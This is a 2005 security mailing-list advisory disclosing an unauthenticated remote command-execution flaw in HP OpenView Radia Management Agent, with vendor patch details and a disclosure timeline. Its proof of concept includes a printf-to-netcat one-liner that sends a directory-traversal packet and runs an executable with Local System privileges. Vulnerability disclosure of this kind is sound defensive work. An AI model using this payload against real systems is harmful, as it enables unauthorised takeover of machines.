From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 1 Aug 2005 18:40:37 +0200
Subject: [NT] HP OpenView Radia Management Agent Command Execution
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050801164038.C851F58CB@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
HP OpenView Radia Management Agent Command Execution
------------------------------------------------------------------------
SUMMARY
The <http://www.hp.com>; Radia Management Agent is part of HP's OpenView
Radia suite of software. By connecting to the listening TCP port and
sending a crafted packet, an attacker can run arbitrary code on the target
machine.
DETAILS
Vulnerable Systems:
* HP OpenView Radia Management Portal versions 2.x and 1.x running Radia
Management Agent
HP OpenView Radia Management Portal runs as a Windows service (RMA) with
Local System privileges. The RMA service listens on a TCP port that is not
fixed. In the example below, the service was listening on TCP port 1065.
Proof of Concept:
By connecting to the TCP port and sending a crafted packet, it is possible
to traverse out of C:\Program Files\Novadigm (the apparent working
directory) and run any executable that is located on the same logical disk
partition, in this case the C: drive.
C:\>sc queryex rma
SERVICE_NAME: rma
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE,
NOT_PAUSABLE,IGNORES_SHUTDOWN))
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 1032
FLAGS :
C:\>netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:1065 0.0.0.0:0 LISTENING 1032
bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v
xx.xx.xx.xx 1065
host.domain [xx.xx.xx.xx] 1065 (?) open
nt authority\system
The output from whoami.exe clearly demonstrates that it is possible for a
remote attacker to execute arbitrary system commands with Local System
privileges without authentication.
Vendor Status:
HP has developed a patch to fix the problem. More information can be found
in their security bulletin:
<http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01138>;
HPSBMA01138
Disclosure Timeline:
Date of initial advisory: 28 April 2005
Date of full advisory: 28 July 2005
ADDITIONAL INFORMATION
The information has been provided by <mailto:nisr@nextgenss.com.>
NGSSoftware Insight Security Research.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
